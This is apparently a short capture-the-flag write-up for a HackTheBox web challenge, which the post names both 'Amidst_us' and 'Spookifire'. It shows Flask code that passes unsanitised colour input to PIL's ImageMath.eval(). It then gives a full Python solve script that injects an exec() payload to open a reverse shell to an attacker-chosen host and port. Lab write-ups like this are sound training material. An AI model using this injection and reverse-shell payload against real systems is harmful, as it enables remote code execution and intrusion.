Post

Amidst_us

Posted
By Hssain Aitkadir 1 min read

banner image

Spookifire is a python flask chalenge on Hackthebox

Description:

this challenge takes an input an image value as base64 encoded and array of colors,

the problem is colors being passed to eval function without sanitizing.

Source code:

Download source code

zip password: hackthebox

Vulnerable code:

1
2

from PIL import Image, ImageMath
# it's using PIL module to generate a new image but the problem is the `ImageMath.eval()` can execute python code.

1
2
3
4
5
6
7
8
9
10
11
12
13
14

alpha = ImageMath.eval( # the vulnerable function
			f'''float(
				max(
				max(
					max(
					difference1(red_band, {color[0]}), <== here you can see that color being passed without sanitizing to eval().
					difference1(green_band, {color[1]})
					),
					difference1(blue_band, {color[2]})

				),
			)''',
		)

Solve:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48


import requests
import base64
import argparse

def send_post_request(image_path, local_url, ip):
    with open(image_path, "rb") as img_file:
        image_data = img_file.read()
        image_base64 = base64.b64encode(image_data).decode('utf-8')

    url = 'http://localhost:1337/api/alphafy'
    payload = "exec('import os,pty,socket;s=socket.socket();s.connect((\"" + local_url + "\"," + ip + "));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"sh\")')"
    print(payload)
    payload = {
        "image": image_base64,
        "background": [
            payload,
            2,
            162
        ]
    }

    headers = {
        'Content-Type': 'application/json',
    }

    response = requests.post(url, json=payload, headers=headers)

    if response.status_code == 200:
        print("Done!, wait don't tell me that you didn't receive your fucking reverse shell")
        print("Response:", response.text)
    else:
        print("This shit didn't work")
        print("Status Code:", response.status_code)
        print("Response:", response.text)


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Send a POST request with an image base64 payload.')
    parser.add_argument('image_path', help='Path to the image file')
    parser.add_argument('local_url', help='revshell url')
    parser.add_argument('port', help='revshell port')
    args = parser.parse_args()

    send_post_request(args.image_path, args.local_url, args.port)
Hackthebox-Challenges, Amidst_us
htb ctf pentesting web code-auditing
This post is licensed under CC BY 4.0 by the author.